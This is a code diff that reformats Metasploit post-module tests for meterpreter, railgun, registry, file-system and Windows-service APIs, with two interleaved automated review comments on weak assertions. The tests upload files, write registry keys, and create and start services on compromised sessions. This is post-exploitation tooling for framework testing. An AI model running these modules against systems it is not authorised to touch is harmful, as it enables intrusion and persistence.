unknowns = windows.select {|w| w[:title] == "<unknown>"}
|
unknowns = windows.select { |w| w[:title] == "<unknown>" }
|
||||||
ret = !unknowns.empty?
|
ret = !unknowns.empty?
|
||||||
end
|
end
|
||||||
|
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
|
|
||||||
parent = windows.select {|w| w[:title] =~ /program manager/i}
|
parent = windows.select { |w| w[:title] =~ /program manager/i }
|
||||||
|
|
||||||
if parent && parent.first
|
if parent && parent.first
|
||||||
it "should return an array of a windows children" do
|
it "should return an array of a windows children" do
|
||||||
|
|
|
@ -1,25 +1,27 @@
|
||||||
|
|
||||||
lib = File.join(Msf::Config.install_root, "test", "lib")
|
lib = File.join(Msf::Config.install_root, "test", "lib")
|
||||||
require 'module_test'
|
require 'module_test'
|
||||||
|
|
||||||
#load 'test/lib/module_test.rb'
|
# load 'test/lib/module_test.rb'
|
||||||
#load 'lib/rex/text.rb'
|
# load 'lib/rex/text.rb'
|
||||||
#load 'lib/msf/core/post/common.rb'
|
# load 'lib/msf/core/post/common.rb'
|
||||||
|
|
||||||
class MetasploitModule < Msf::Post
|
class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
include Msf::ModuleTest::PostTest
|
include Msf::ModuleTest::PostTest
|
||||||
include Msf::Post::Common
|
include Msf::Post::Common
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'Test Post::Common Get Envs',
|
update_info(
|
||||||
'Description' => %q{ This module will test Post::Common get envs API methods },
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'Test Post::Common Get Envs',
|
||||||
'Author' => [ 'Ben Campbell'],
|
'Description' => %q{ This module will test Post::Common get envs API methods },
|
||||||
'Platform' => [ 'windows', 'linux', 'java', 'python' ],
|
'License' => MSF_LICENSE,
|
||||||
'SessionTypes' => [ 'meterpreter', 'shell' ]
|
'Author' => [ 'Ben Campbell'],
|
||||||
))
|
'Platform' => [ 'windows', 'linux', 'java', 'python' ],
|
||||||
|
'SessionTypes' => [ 'meterpreter', 'shell' ]
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_get_env_windows
|
def test_get_env_windows
|
||||||
|
@ -41,7 +43,7 @@ class MetasploitModule < Msf::Post
|
||||||
it "should return user" do
|
it "should return user" do
|
||||||
user = get_env('USER')
|
user = get_env('USER')
|
||||||
!user.blank?
|
!user.blank?
|
||||||
end
|
end
|
||||||
|
|
||||||
it "should handle $ sign" do
|
it "should handle $ sign" do
|
||||||
user = get_env('$USER')
|
user = get_env('$USER')
|
||||||
|
@ -52,7 +54,7 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
def test_get_envs
|
def test_get_envs
|
||||||
it "should return multiple envs" do
|
it "should return multiple envs" do
|
||||||
res = get_envs('PATH','USERNAME','USER')
|
res = get_envs('PATH', 'USERNAME', 'USER')
|
||||||
if session.platform =~ /win/i
|
if session.platform =~ /win/i
|
||||||
!res['PATH'].blank? && !res['USERNAME'].blank?
|
!res['PATH'].blank? && !res['USERNAME'].blank?
|
||||||
else
|
else
|
||||||
|
@ -62,4 +64,3 @@ class MetasploitModule < Msf::Post
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,3 @@
|
||||||
|
|
||||||
require 'rex/post/meterpreter/extensions/stdapi/command_ids'
|
require 'rex/post/meterpreter/extensions/stdapi/command_ids'
|
||||||
require 'rex'
|
require 'rex'
|
||||||
|
|
||||||
|
@ -10,20 +9,24 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
include Msf::ModuleTest::PostTest
|
include Msf::ModuleTest::PostTest
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'Testing Meterpreter Stuff',
|
update_info(
|
||||||
'Description' => %q{ This module will test meterpreter API methods },
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'Testing Meterpreter Stuff',
|
||||||
'Author' => [ 'egypt'],
|
'Description' => %q{ This module will test meterpreter API methods },
|
||||||
'Platform' => [ 'windows', 'linux', 'java' ],
|
'License' => MSF_LICENSE,
|
||||||
'SessionTypes' => [ 'meterpreter' ]
|
'Author' => [ 'egypt'],
|
||||||
))
|
'Platform' => [ 'windows', 'linux', 'java' ],
|
||||||
|
'SessionTypes' => [ 'meterpreter' ]
|
||||||
|
)
|
||||||
|
)
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptBool.new("AddEntropy" , [false, "Add entropy token to file and directory names.", false]),
|
OptBool.new("AddEntropy", [false, "Add entropy token to file and directory names.", false]),
|
||||||
OptString.new("BaseFileName" , [true, "File/dir base name", "meterpreter-test"])
|
OptString.new("BaseFileName", [true, "File/dir base name", "meterpreter-test"])
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
|
@ -81,7 +84,7 @@ class MetasploitModule < Msf::Post
|
||||||
ret &&= (list && list.length > 0)
|
ret &&= (list && list.length > 0)
|
||||||
if session.commands.include? Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_SYS_PROCESS_GETPID
|
if session.commands.include? Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_SYS_PROCESS_GETPID
|
||||||
pid ||= session.sys.process.getpid
|
pid ||= session.sys.process.getpid
|
||||||
process = list.find{ |p| p['pid'] == pid }
|
process = list.find { |p| p['pid'] == pid }
|
||||||
vprint_status("PID info: #{process.inspect}")
|
vprint_status("PID info: #{process.inspect}")
|
||||||
ret &&= !(process.nil?)
|
ret &&= !(process.nil?)
|
||||||
else
|
else
|
||||||
|
@ -90,7 +93,6 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_sys_config
|
def test_sys_config
|
||||||
|
@ -125,7 +127,7 @@ class MetasploitModule < Msf::Post
|
||||||
ifaces = session.net.config.get_interfaces
|
ifaces = session.net.config.get_interfaces
|
||||||
res = !!(ifaces and ifaces.length > 0)
|
res = !!(ifaces and ifaces.length > 0)
|
||||||
|
|
||||||
res &&= !! ifaces.find { |iface|
|
res &&= !!ifaces.find { |iface|
|
||||||
iface.addrs.find { |addr|
|
iface.addrs.find { |addr|
|
||||||
addr == session.session_host
|
addr == session.session_host
|
||||||
}
|
}
|
||||||
|
@ -141,13 +143,12 @@ class MetasploitModule < Msf::Post
|
||||||
routes and routes.length > 0
|
routes and routes.length > 0
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_fs
|
def test_fs
|
||||||
vprint_status("Starting filesystem tests")
|
vprint_status("Starting filesystem tests")
|
||||||
if datastore["AddEntropy"]
|
if datastore["AddEntropy"]
|
||||||
entropy_value = '-' + ('a'..'z').to_a.shuffle[0,8].join
|
entropy_value = '-' + ('a'..'z').to_a.shuffle[0, 8].join
|
||||||
else
|
else
|
||||||
entropy_value = ""
|
entropy_value = ""
|
||||||
end
|
end
|
||||||
|
@ -252,7 +253,7 @@ class MetasploitModule < Msf::Post
|
||||||
res = true
|
res = true
|
||||||
remote = "#{datastore["BaseFileName"]}-file#{entropy_value}.txt"
|
remote = "#{datastore["BaseFileName"]}-file#{entropy_value}.txt"
|
||||||
vprint_status("Remote File Name: #{remote}")
|
vprint_status("Remote File Name: #{remote}")
|
||||||
local = __FILE__
|
local = __FILE__
|
||||||
vprint_status("uploading")
|
vprint_status("uploading")
|
||||||
session.fs.file.upload_file(remote, local)
|
session.fs.file.upload_file(remote, local)
|
||||||
vprint_status("done")
|
vprint_status("done")
|
||||||
|
@ -333,7 +334,7 @@ class MetasploitModule < Msf::Post
|
||||||
res = true
|
res = true
|
||||||
remote = "#{datastore["BaseFileName"]}-file#{entropy_value}.txt"
|
remote = "#{datastore["BaseFileName"]}-file#{entropy_value}.txt"
|
||||||
vprint_status("Remote File Name: #{remote}")
|
vprint_status("Remote File Name: #{remote}")
|
||||||
local = __FILE__
|
local = __FILE__
|
||||||
vprint_status("uploading")
|
vprint_status("uploading")
|
||||||
session.fs.file.upload_file(remote, local)
|
session.fs.file.upload_file(remote, local)
|
||||||
vprint_status("done")
|
vprint_status("done")
|
||||||
|
@ -342,20 +343,19 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
if res
|
if res
|
||||||
remote_md5 = session.fs.file.md5(remote)
|
remote_md5 = session.fs.file.md5(remote)
|
||||||
local_md5 = Digest::MD5.digest(::File.read(local, mode: 'rb'))
|
local_md5 = Digest::MD5.digest(::File.read(local, mode: 'rb'))
|
||||||
remote_sha = session.fs.file.sha1(remote)
|
remote_sha = session.fs.file.sha1(remote)
|
||||||
local_sha = Digest::SHA1.digest(::File.read(local, mode: 'rb'))
|
local_sha = Digest::SHA1.digest(::File.read(local, mode: 'rb'))
|
||||||
vprint_status("remote md5: #{Rex::Text.to_hex(remote_md5,'')}")
|
vprint_status("remote md5: #{Rex::Text.to_hex(remote_md5, '')}")
|
||||||
vprint_status("local md5 : #{Rex::Text.to_hex(local_md5,'')}")
|
vprint_status("local md5 : #{Rex::Text.to_hex(local_md5, '')}")
|
||||||
vprint_status("remote sha: #{Rex::Text.to_hex(remote_sha,'')}")
|
vprint_status("remote sha: #{Rex::Text.to_hex(remote_sha, '')}")
|
||||||
vprint_status("local sha : #{Rex::Text.to_hex(local_sha,'')}")
|
vprint_status("local sha : #{Rex::Text.to_hex(local_sha, '')}")
|
||||||
res &&= (remote_md5 == local_md5)
|
res &&= (remote_md5 == local_md5)
|
||||||
end
|
end
|
||||||
|
|
||||||
session.fs.file.rm(remote)
|
session.fs.file.rm(remote)
|
||||||
res
|
res
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
=begin
|
=begin
|
||||||
|
@ -387,7 +387,7 @@ class MetasploitModule < Msf::Post
|
||||||
super
|
super
|
||||||
end
|
end
|
||||||
|
|
||||||
protected
|
protected
|
||||||
|
|
||||||
def create_directory(name)
|
def create_directory(name)
|
||||||
res = true
|
res = true
|
||||||
|
@ -403,5 +403,4 @@ protected
|
||||||
res
|
res
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
end
|
end
|
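Review bot: The upload test in the hunk starting at old line 342 computes and prints `remote_sha` and `local_sha` but compares only the MD5 digests, so a SHA-1 mismatch between the uploaded and local file would go unnoticed. Adding `res &&= (remote_sha == local_sha)` right after `res &&= (remote_md5 == local_md5)` would make the test check both values it already retrieves. The enclosing `it` block begins outside the hunk, so whether `res` is reassigned earlier was not reviewed. `session.fs.file.rm(remote)` also appears to run only on the normal path; if an earlier call can raise, an `ensure` would keep the test file from being left on the target.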
||||||
|
|
|
@ -1,5 +1,3 @@
|
||||||
|
|
||||||
|
|
||||||
lib = File.join(Msf::Config.install_root, "test", "lib")
|
lib = File.join(Msf::Config.install_root, "test", "lib")
|
||||||
require 'module_test'
|
require 'module_test'
|
||||||
|
|
||||||
|
@ -9,14 +7,17 @@ class MetasploitModule < Msf::Post
|
||||||
include Msf::Post::File
|
include Msf::Post::File
|
||||||
include Msf::Post::Windows::FileInfo
|
include Msf::Post::Windows::FileInfo
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'Railgun API Tests',
|
update_info(
|
||||||
'Description' => %q{ This module will test railgun api functions },
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'Railgun API Tests',
|
||||||
'Author' => [ 'Spencer McIntyre' ],
|
'Description' => %q{ This module will test railgun api functions },
|
||||||
'Platform' => [ 'linux', 'osx', 'windows' ]
|
'License' => MSF_LICENSE,
|
||||||
))
|
'Author' => [ 'Spencer McIntyre' ],
|
||||||
|
'Platform' => [ 'linux', 'osx', 'windows' ]
|
||||||
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_api_function_calls_libc
|
def test_api_function_calls_libc
|
||||||
|
@ -89,6 +90,7 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
def test_api_function_file_info_windows
|
def test_api_function_file_info_windows
|
||||||
return unless session.platform == 'windows'
|
return unless session.platform == 'windows'
|
||||||
|
|
||||||
it "Should retrieve the win32k file version" do
|
it "Should retrieve the win32k file version" do
|
||||||
path = expand_path('%WINDIR%\\system32\\win32k.sys')
|
path = expand_path('%WINDIR%\\system32\\win32k.sys')
|
||||||
major, minor, build, revision, brand = file_version(path)
|
major, minor, build, revision, brand = file_version(path)
|
||||||
|
@ -98,6 +100,7 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
def test_api_function_calls_windows
|
def test_api_function_calls_windows
|
||||||
return unless session.platform == 'windows'
|
return unless session.platform == 'windows'
|
||||||
|
|
||||||
it "Should include error information in the results" do
|
it "Should include error information in the results" do
|
||||||
ret = true
|
ret = true
|
||||||
result = session.railgun.kernel32.GetCurrentProcess()
|
result = session.railgun.kernel32.GetCurrentProcess()
|
||||||
|
|
|
@ -1,4 +1,3 @@
|
||||||
|
|
||||||
##
|
##
|
||||||
# This module requires Metasploit: https://metasploit.com/download
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
@ -14,43 +13,45 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
include Msf::ModuleTest::PostTest
|
include Msf::ModuleTest::PostTest
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'railgun_testing',
|
update_info(
|
||||||
'Description' => %q{ This module will test railgun code used in post modules},
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'railgun_testing',
|
||||||
'Author' => [ 'kernelsmith'],
|
'Description' => %q{ This module will test railgun code used in post modules},
|
||||||
'Platform' => [ 'windows' ]
|
'License' => MSF_LICENSE,
|
||||||
))
|
'Author' => [ 'kernelsmith'],
|
||||||
|
'Platform' => [ 'windows' ]
|
||||||
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptInt.new("ERR_CODE", [ false, "Error code to reverse lookup" ]),
|
OptInt.new("ERR_CODE", [ false, "Error code to reverse lookup" ]),
|
||||||
OptInt.new("WIN_CONST", [ false, "Windows constant to reverse lookup" ]),
|
OptInt.new("WIN_CONST", [ false, "Windows constant to reverse lookup" ]),
|
||||||
OptRegexp.new("WCREGEX", [ false, "Regexp to apply to constant rev lookup" ]),
|
OptRegexp.new("WCREGEX", [ false, "Regexp to apply to constant rev lookup" ]),
|
||||||
OptRegexp.new("ECREGEX", [ false, "Regexp to apply to error code lookup" ]),
|
OptRegexp.new("ECREGEX", [ false, "Regexp to apply to error code lookup" ]),
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Return an array of windows constants names matching +winconst+
|
# Return an array of windows constants names matching +winconst+
|
||||||
#
|
#
|
||||||
def select_const_names(winconst, filter_regex=nil)
|
def select_const_names(winconst, filter_regex = nil)
|
||||||
session.railgun.constant_manager.select_const_names(winconst, filter_regex)
|
session.railgun.constant_manager.select_const_names(winconst, filter_regex)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Returns an array of windows error code names for a given windows error code matching +err_code+
|
# Returns an array of windows error code names for a given windows error code matching +err_code+
|
||||||
#
|
#
|
||||||
def lookup_error(err_code, filter_regex=nil)
|
def lookup_error(err_code, filter_regex = nil)
|
||||||
select_const_names(err_code, /^ERROR_/).select do |name|
|
select_const_names(err_code, /^ERROR_/).select do |name|
|
||||||
name =~ filter_regex
|
name =~ filter_regex
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_static
|
def test_static
|
||||||
|
|
||||||
it "should return a constant name given a const and a filter" do
|
it "should return a constant name given a const and a filter" do
|
||||||
ret = true
|
ret = true
|
||||||
results = select_const_names(4, /^SERVICE/)
|
results = select_const_names(4, /^SERVICE/)
|
||||||
|
@ -78,16 +79,14 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_datastore
|
def test_datastore
|
||||||
|
|
||||||
if (datastore["WIN_CONST"])
|
if (datastore["WIN_CONST"])
|
||||||
it "should look up arbitrary constants" do
|
it "should look up arbitrary constants" do
|
||||||
ret = true
|
ret = true
|
||||||
results = select_const_names(datastore['WIN_CONST'], datastore['WCREGEX'])
|
results = select_const_names(datastore['WIN_CONST'], datastore['WCREGEX'])
|
||||||
#vprint_status("RESULTS: #{results.class} #{results.pretty_inspect}")
|
# vprint_status("RESULTS: #{results.class} #{results.pretty_inspect}")
|
||||||
|
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
|
@ -97,13 +96,10 @@ class MetasploitModule < Msf::Post
|
||||||
it "should look up arbitrary error codes" do
|
it "should look up arbitrary error codes" do
|
||||||
ret = true
|
ret = true
|
||||||
results = lookup_error(datastore['ERR_CODE'], datastore['ECREGEX'])
|
results = lookup_error(datastore['ERR_CODE'], datastore['ECREGEX'])
|
||||||
#vprint_status("RESULTS: #{results.class} #{results.inspect}")
|
# vprint_status("RESULTS: #{results.class} #{results.inspect}")
|
||||||
|
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
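Review bot: Both `it` blocks in `test_datastore` set `ret = true`, store the lookup in `results` and return `ret` without reading `results`, so they pass whatever `select_const_names` or `lookup_error` return. A line such as `ret &&= results.kind_of?(Array) && !results.empty?` before the final `ret` would make them assert something; the expected shape is assumed from the method comments and should be confirmed. Separately, `lookup_error` declares `filter_regex = nil` but evaluates `name =~ filter_regex`, which is nil for a nil filter, so the default appears to select nothing. `filter_regex.nil? || name =~ filter_regex` would give the default a useful meaning. `/^ERROR_/` could also be written `/\AERROR_/` so the match is anchored to the start of the string rather than of a line.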
||||||
|
|
|
@ -1,4 +1,3 @@
|
||||||
|
|
||||||
##
|
##
|
||||||
# This module requires Metasploit: https://metasploit.com/download
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
@ -15,23 +14,26 @@ class MetasploitModule < Msf::Post
|
||||||
include Msf::ModuleTest::PostTest
|
include Msf::ModuleTest::PostTest
|
||||||
include Msf::Post::Windows::Registry
|
include Msf::Post::Windows::Registry
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'registry_post_testing',
|
update_info(
|
||||||
'Description' => %q{ This module will test Post::Windows::Registry API methods },
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'registry_post_testing',
|
||||||
'Author' => [
|
'Description' => %q{ This module will test Post::Windows::Registry API methods },
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' => [
|
||||||
'kernelsmith', # original
|
'kernelsmith', # original
|
||||||
'egypt', # PostTest conversion
|
'egypt', # PostTest conversion
|
||||||
],
|
],
|
||||||
'Platform' => [ 'windows' ]
|
'Platform' => [ 'windows' ]
|
||||||
))
|
)
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_0_registry_read
|
def test_0_registry_read
|
||||||
it "should evaluate key existence" do
|
it "should evaluate key existence" do
|
||||||
k_exists = registry_key_exist?(%q#HKCU\Environment#)
|
k_exists = registry_key_exist?(%q#HKCU\Environment#)
|
||||||
k_dne = registry_key_exist?(%q#HKLM\\Non\Existent\Key#)
|
k_dne = registry_key_exist?(%q#HKLM\\Non\Existent\Key#)
|
||||||
|
|
||||||
(k_exists && !k_dne)
|
(k_exists && !k_dne)
|
||||||
end
|
end
|
||||||
|
@ -39,7 +41,7 @@ class MetasploitModule < Msf::Post
|
||||||
pending "should evaluate value existence" do
|
pending "should evaluate value existence" do
|
||||||
# these methods are not implemented
|
# these methods are not implemented
|
||||||
v_exists = registry_value_exist?(%q#HKCU\Environment#, "TEMP")
|
v_exists = registry_value_exist?(%q#HKCU\Environment#, "TEMP")
|
||||||
v_dne = registry_value_exist?(%q#HKLM\\Non\Existent\Key#, "asdf")
|
v_dne = registry_value_exist?(%q#HKLM\\Non\Existent\Key#, "asdf")
|
||||||
|
|
||||||
(v_exists && !v_dne)
|
(v_exists && !v_dne)
|
||||||
end
|
end
|
||||||
|
@ -99,7 +101,6 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_1_registry_write
|
def test_1_registry_write
|
||||||
|
@ -172,7 +173,6 @@ class MetasploitModule < Msf::Post
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
it "should delete unicode keys" do
|
it "should delete unicode keys" do
|
||||||
ret = registry_deleteval(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str")
|
ret = registry_deleteval(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str")
|
||||||
valinfo = registry_getvalinfo(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str")
|
valinfo = registry_getvalinfo(%q#HKCU\σονσλυσιονεμκυε#, "test_val_str")
|
||||||
|
@ -185,9 +185,6 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,4 +1,3 @@
|
||||||
|
|
||||||
require 'rex/post/meterpreter/extensions/stdapi/command_ids'
|
require 'rex/post/meterpreter/extensions/stdapi/command_ids'
|
||||||
require 'rex'
|
require 'rex'
|
||||||
|
|
||||||
|
@ -10,20 +9,24 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
include Msf::ModuleTest::PostTest
|
include Msf::ModuleTest::PostTest
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'Testing Meterpreter Search',
|
update_info(
|
||||||
'Description' => %q{ This module will test the meterpreter search method },
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'Testing Meterpreter Search',
|
||||||
'Author' => [ 'timwr'],
|
'Description' => %q{ This module will test the meterpreter search method },
|
||||||
'Platform' => [ 'windows', 'linux', 'java' ],
|
'License' => MSF_LICENSE,
|
||||||
'SessionTypes' => [ 'meterpreter' ]
|
'Author' => [ 'timwr'],
|
||||||
))
|
'Platform' => [ 'windows', 'linux', 'java' ],
|
||||||
|
'SessionTypes' => [ 'meterpreter' ]
|
||||||
|
)
|
||||||
|
)
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptBool.new("AddEntropy" , [false, "Add entropy token to file and directory names.", false]),
|
OptBool.new("AddEntropy", [false, "Add entropy token to file and directory names.", false]),
|
||||||
OptString.new("BaseFileName" , [true, "File/dir base name", "meterpreter-test"])
|
OptString.new("BaseFileName", [true, "File/dir base name", "meterpreter-test"])
|
||||||
], self.class)
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def setup
|
def setup
|
||||||
|
@ -38,7 +41,7 @@ class MetasploitModule < Msf::Post
|
||||||
session.fs.dir.chdir(tmp)
|
session.fs.dir.chdir(tmp)
|
||||||
|
|
||||||
if datastore["AddEntropy"]
|
if datastore["AddEntropy"]
|
||||||
entropy_value = '-' + ('a'..'z').to_a.shuffle[0,8].join
|
entropy_value = '-' + ('a'..'z').to_a.shuffle[0, 8].join
|
||||||
else
|
else
|
||||||
entropy_value = ""
|
entropy_value = ""
|
||||||
end
|
end
|
||||||
|
|
|
@ -13,27 +13,31 @@ class MetasploitModule < Msf::Post
|
||||||
include Msf::Post::Windows::Services
|
include Msf::Post::Windows::Services
|
||||||
include Msf::ModuleTest::PostTest
|
include Msf::ModuleTest::PostTest
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super( update_info( info,
|
super(
|
||||||
'Name' => 'Test Post::Windows::Services',
|
update_info(
|
||||||
'Description' => %q{ This module will test windows services methods within a shell},
|
info,
|
||||||
'License' => MSF_LICENSE,
|
'Name' => 'Test Post::Windows::Services',
|
||||||
'Author' => [ 'kernelsmith', 'egypt' ],
|
'Description' => %q{ This module will test windows services methods within a shell},
|
||||||
'Platform' => [ 'windows' ],
|
'License' => MSF_LICENSE,
|
||||||
'SessionTypes' => [ 'meterpreter', 'shell' ]
|
'Author' => [ 'kernelsmith', 'egypt' ],
|
||||||
))
|
'Platform' => [ 'windows' ],
|
||||||
|
'SessionTypes' => [ 'meterpreter', 'shell' ]
|
||||||
|
)
|
||||||
|
)
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new("QSERVICE" , [true, "Service (keyname) to query", "winmgmt"]),
|
OptString.new("QSERVICE", [true, "Service (keyname) to query", "winmgmt"]),
|
||||||
OptString.new("NSERVICE" , [true, "New Service (keyname) to create/del", "testes"]),
|
OptString.new("NSERVICE", [true, "New Service (keyname) to create/del", "testes"]),
|
||||||
OptString.new("SSERVICE" , [true, "Service (keyname) to start/stop", "W32Time"]),
|
OptString.new("SSERVICE", [true, "Service (keyname) to start/stop", "W32Time"]),
|
||||||
OptString.new("DNAME" , [true, "Display name used for create test", "Cool display name"]),
|
OptString.new("DNAME", [true, "Display name used for create test", "Cool display name"]),
|
||||||
OptString.new("BINPATH" , [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]),
|
OptString.new("BINPATH", [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]),
|
||||||
OptEnum.new("MODE", [true, "Mode to use for startup/create tests", "auto",
|
OptEnum.new("MODE", [
|
||||||
["auto", "manual", "disable"]
|
true, "Mode to use for startup/create tests", "auto",
|
||||||
]),
|
["auto", "manual", "disable"]
|
||||||
], self.class)
|
]),
|
||||||
|
], self.class
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def test_start
|
def test_start
|
||||||
|
@ -65,7 +69,7 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
ret &&= results.kind_of? Array
|
ret &&= results.kind_of? Array
|
||||||
ret &&= results.length > 0
|
ret &&= results.length > 0
|
||||||
ret &&= results.select{|service| service[:name] == datastore["QSERVICE"]}
|
ret &&= results.select { |service| service[:name] == datastore["QSERVICE"] }
|
||||||
|
|
||||||
ret
|
ret
|
||||||
end
|
end
|
||||||
|
@ -92,11 +96,11 @@ class MetasploitModule < Msf::Post
|
||||||
def test_create
|
def test_create
|
||||||
it "should create a service #{datastore["NSERVICE"]}" do
|
it "should create a service #{datastore["NSERVICE"]}" do
|
||||||
mode = case datastore["MODE"]
|
mode = case datastore["MODE"]
|
||||||
when "disable"; START_TYPE_DISABLED
|
when "disable"; START_TYPE_DISABLED
|
||||||
when "manual"; START_TYPE_MANUAL
|
when "manual"; START_TYPE_MANUAL
|
||||||
when "auto"; START_TYPE_AUTO
|
when "auto"; START_TYPE_AUTO
|
||||||
else; START_TYPE AUTO
|
else; START_TYPE AUTO
|
||||||
end
|
end
|
||||||
|
|
||||||
ret = service_create(datastore['NSERVICE'],
|
ret = service_create(datastore['NSERVICE'],
|
||||||
display: datastore['DNAME'],
|
display: datastore['DNAME'],
|
||||||
|
@ -151,16 +155,16 @@ class MetasploitModule < Msf::Post
|
||||||
ret = true
|
ret = true
|
||||||
|
|
||||||
results = service_create(service_name,
|
results = service_create(service_name,
|
||||||
display: display_name,
|
display: display_name,
|
||||||
path: datastore['BINPATH'],
|
path: datastore['BINPATH'],
|
||||||
starttype: START_TYPE_DISABLED)
|
starttype: START_TYPE_DISABLED)
|
||||||
|
|
||||||
ret &&= (results == Windows::Error::SUCCESS)
|
ret &&= (results == Windows::Error::SUCCESS)
|
||||||
results = service_status(service_name)
|
results = service_status(service_name)
|
||||||
ret &&= results.kind_of? Hash
|
ret &&= results.kind_of? Hash
|
||||||
if ret
|
if ret
|
||||||
original_display = results[:display]
|
original_display = results[:display]
|
||||||
results = service_change_config(service_name, {:display => Rex::Text.rand_text_alpha(5)})
|
results = service_change_config(service_name, { :display => Rex::Text.rand_text_alpha(5) })
|
||||||
ret &&= (results == Windows::Error::SUCCESS)
|
ret &&= (results == Windows::Error::SUCCESS)
|
||||||
|
|
||||||
results = service_info(service_name)
|
results = service_info(service_name)
|
||||||
|
@ -181,9 +185,9 @@ class MetasploitModule < Msf::Post
|
||||||
it "should start a disabled service #{service_name}" do
|
it "should start a disabled service #{service_name}" do
|
||||||
ret = true
|
ret = true
|
||||||
results = service_create(service_name,
|
results = service_create(service_name,
|
||||||
display: display_name,
|
display: display_name,
|
||||||
path: datastore['BINPATH'],
|
path: datastore['BINPATH'],
|
||||||
starttype: START_TYPE_DISABLED)
|
starttype: START_TYPE_DISABLED)
|
||||||
|
|
||||||
ret &&= (results == Windows::Error::SUCCESS)
|
ret &&= (results == Windows::Error::SUCCESS)
|
||||||
if ret
|
if ret
|
||||||
|
|
|
@ -1,12 +1,11 @@
|
||||||
|
|
||||||
lib = File.join(Msf::Config.install_root, "test", "lib")
|
